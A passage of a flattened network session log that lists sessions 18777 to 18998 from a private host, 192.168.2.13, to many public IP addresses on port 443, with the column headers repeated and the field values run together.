                                    18777192.168.2.1344938135.198.12.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18778192.168.2.133898870.145.226.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18779192.168.2.1358480221.156.209.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18780192.168.2.133309878.145.143.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18781192.168.2.1354796170.15.230.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18782192.168.2.1344434179.149.132.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18783192.168.2.1337072176.163.120.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18784192.168.2.1340452190.230.165.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18785192.168.2.1354578135.209.160.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18786192.168.2.1354586174.135.3.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18787192.168.2.1347898177.65.26.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18788192.168.2.1348368112.191.119.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18789192.168.2.1336428219.181.124.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18790192.168.2.1356646195.230.100.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18791192.168.2.1338888155.53.106.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18792192.168.2.136064832.125.50.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18793192.168.2.1354314164.107.242.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18794192.168.2.1340814178.36.9.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18795192.168.2.134967258.36.175.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18796192.168.2.13555122.11.1.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18797192.168.2.13589645.140.213.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18798192.168.2.1359294120.212.116.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18799192.168.2.135161864.179.81.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18800192.168.2.135080273.26.184.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18801192.168.2.13520448.127.32.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18802192.168.2.133696445.48.63.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18803192.168.2.134011851.7.181.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18804192.168.2.133550220.249.62.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18805192.168.2.133736274.188.192.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18806192.168.2.1335492182.39.89.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18807192.168.2.1357834100.154.247.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18808192.168.2.1352964131.204.228.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18809192.168.2.1338552163.117.137.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18810192.168.2.1337418219.30.254.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18811192.168.2.135646217.133.234.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18812192.168.2.133648069.46.145.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18813192.168.2.134131485.255.245.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18814192.168.2.135761247.57.74.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18815192.168.2.135011687.96.25.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18816192.168.2.135409854.17.42.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18817192.168.2.133871439.217.40.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18818192.168.2.133834077.42.207.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18819192.168.2.1339126182.43.96.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18820192.168.2.134143825.58.127.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18821192.168.2.1359782105.32.52.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18822192.168.2.134986218.187.28.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18823192.168.2.13573321.191.226.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18824192.168.2.1356176115.68.7.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18825192.168.2.1342984130.26.173.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18826192.168.2.1339164144.49.41.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18827192.168.2.134880690.202.183.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18828192.168.2.1343640223.5.20.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18829192.168.2.1348468186.20.52.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18830192.168.2.133725689.167.146.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18831192.168.2.133939638.251.148.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18832192.168.2.1349802157.212.161.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18833192.168.2.135088862.87.91.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18834192.168.2.134893053.131.38.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18835192.168.2.1335452149.181.80.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18836192.168.2.134563447.94.187.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18837192.168.2.1357380195.147.181.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18838192.168.2.133822090.192.167.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18839192.168.2.134193062.156.71.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18840192.168.2.1336398159.119.214.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18841192.168.2.134317442.236.7.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18842192.168.2.1354452165.161.184.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18843192.168.2.1360076208.148.138.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18844192.168.2.135304439.188.24.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18845192.168.2.135170691.198.138.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18846192.168.2.1348180210.173.145.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18847192.168.2.1338744121.159.228.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18848192.168.2.1352334209.67.206.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18849192.168.2.1354620126.208.202.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18850192.168.2.1360240149.65.120.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18851192.168.2.1347488121.151.218.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18852192.168.2.1349576111.71.135.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18853192.168.2.135192435.65.138.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18854192.168.2.1337206100.187.10.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18855192.168.2.135745852.226.55.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18856192.168.2.133746669.2.150.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18857192.168.2.133299258.80.196.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18858192.168.2.1334444113.73.2.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18859192.168.2.1345964152.187.93.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18860192.168.2.1352536146.178.217.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18861192.168.2.134423437.221.173.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18862192.168.2.134167869.86.58.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18863192.168.2.1342466183.85.150.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18864192.168.2.1359920118.239.92.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18865192.168.2.1354038176.26.125.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18866192.168.2.1341768100.240.251.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18867192.168.2.134632848.104.56.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18868192.168.2.135270227.84.172.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18869192.168.2.1351156192.24.192.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18870192.168.2.135029232.79.217.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18871192.168.2.1347440111.87.221.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18872192.168.2.133786664.184.59.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18873192.168.2.1341790211.45.194.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18874192.168.2.135998882.51.9.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18875192.168.2.1360974190.100.250.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18876192.168.2.1351926135.163.231.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18877192.168.2.1333976209.26.191.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18878192.168.2.1357688136.34.15.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18879192.168.2.135683290.219.180.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18880192.168.2.1360092123.157.149.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18881192.168.2.136034044.119.133.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18882192.168.2.135319264.120.202.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18883192.168.2.1349080135.21.219.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18884192.168.2.1352226147.205.183.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18885192.168.2.1356956126.255.191.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18886192.168.2.1357884148.102.214.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18887192.168.2.1355930165.151.249.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18888192.168.2.1337462109.21.6.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18889192.168.2.1343368165.8.51.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18890192.168.2.1338806208.176.15.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18891192.168.2.135486427.53.97.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18892192.168.2.135770436.221.221.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18893192.168.2.134353882.112.200.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18894192.168.2.135654468.10.111.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18895192.168.2.135137432.172.96.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18896192.168.2.1352108134.146.247.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18897192.168.2.1341776112.141.95.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18898192.168.2.1341422168.62.130.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18899192.168.2.135643698.56.102.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18900192.168.2.1356500104.132.134.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18901192.168.2.1344372170.82.81.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18902192.168.2.1337260149.243.144.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18903192.168.2.1351562217.50.35.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18904192.168.2.13514649.61.241.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18905192.168.2.1344132153.114.27.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18906192.168.2.133650234.127.235.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18907192.168.2.1333516139.21.6.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18908192.168.2.135412480.30.7.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18909192.168.2.1350908114.111.209.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18910192.168.2.1339328181.216.214.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18911192.168.2.1351428153.11.241.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18912192.168.2.1344874186.148.6.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18913192.168.2.1344866140.137.26.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18914192.168.2.1345532149.236.7.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18915192.168.2.1340846153.43.199.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18916192.168.2.1339150121.100.137.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18917192.168.2.136042876.55.150.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18918192.168.2.133911412.161.81.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18919192.168.2.1341082100.213.49.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18920192.168.2.1357980202.235.0.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18921192.168.2.1347844118.253.254.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18922192.168.2.1360964111.152.124.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18923192.168.2.133980048.100.170.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18924192.168.2.1334224146.185.221.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18925192.168.2.134763489.11.119.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18926192.168.2.1345148116.39.75.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18927192.168.2.1355406161.146.89.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18928192.168.2.1345348202.106.246.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18929192.168.2.1348940167.223.177.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18930192.168.2.1350320171.168.56.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18931192.168.2.1342882196.252.209.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18932192.168.2.1356462193.94.245.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18933192.168.2.1349424105.219.87.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18934192.168.2.1355750198.36.1.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18935192.168.2.1350362170.168.61.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18936192.168.2.1333902182.88.68.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18937192.168.2.1351712206.210.156.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18938192.168.2.1358828184.55.213.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18939192.168.2.133666075.100.251.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18940192.168.2.136037470.11.41.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18941192.168.2.1354366125.67.217.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18942192.168.2.135184058.221.80.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18943192.168.2.1350678150.72.175.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18944192.168.2.135522059.172.15.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18945192.168.2.136055696.11.47.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18946192.168.2.135805089.157.249.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18947192.168.2.133365462.155.96.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18948192.168.2.1359728198.197.127.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18949192.168.2.134520043.243.200.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18950192.168.2.1340056105.94.92.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18951192.168.2.135204434.238.111.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18952192.168.2.1345504206.114.188.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18953192.168.2.1346202217.255.228.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18954192.168.2.1333500182.5.120.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18955192.168.2.134163240.220.242.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18956192.168.2.1356574101.120.178.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18957192.168.2.1333138212.153.213.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18958192.168.2.133966042.87.205.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18959192.168.2.1360778189.173.47.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18960192.168.2.1352896160.71.137.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18961192.168.2.134084058.48.47.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18962192.168.2.1336146181.240.12.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18963192.168.2.1346848149.108.144.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18964192.168.2.136027687.247.122.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18965192.168.2.1348108165.77.104.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18966192.168.2.1357976168.28.216.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18967192.168.2.136076269.130.168.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18968192.168.2.1356320152.212.209.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18969192.168.2.1346112119.41.142.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18970192.168.2.1337288165.227.7.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18971192.168.2.134582291.195.239.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18972192.168.2.133993697.196.185.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18973192.168.2.1345846213.39.157.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18974192.168.2.1336240208.63.54.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18975192.168.2.1333942179.74.136.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18976192.168.2.1340906100.151.90.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18977192.168.2.134728869.144.104.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18978192.168.2.1341912137.46.73.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18979192.168.2.1346342142.96.248.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18980192.168.2.1356592212.164.35.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18981192.168.2.1344008197.120.249.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18982192.168.2.134261695.190.127.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18983192.168.2.1340340150.108.130.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18984192.168.2.1359302139.117.182.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18985192.168.2.1347458186.132.187.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18986192.168.2.13536784.191.83.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18987192.168.2.1353334166.119.188.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18988192.168.2.134419032.33.53.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18989192.168.2.135520689.167.32.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18990192.168.2.135095299.111.34.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18991192.168.2.1358524104.56.106.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18992192.168.2.135376871.50.221.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18993192.168.2.133336085.42.5.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18994192.168.2.1337200121.200.226.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18995192.168.2.134694661.239.177.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18996192.168.2.13477322.181.13.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18997192.168.2.134252661.144.138.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    18998192.168.2.133635267.223.12.223443
                                    TimestampBytes transferredDirectionData


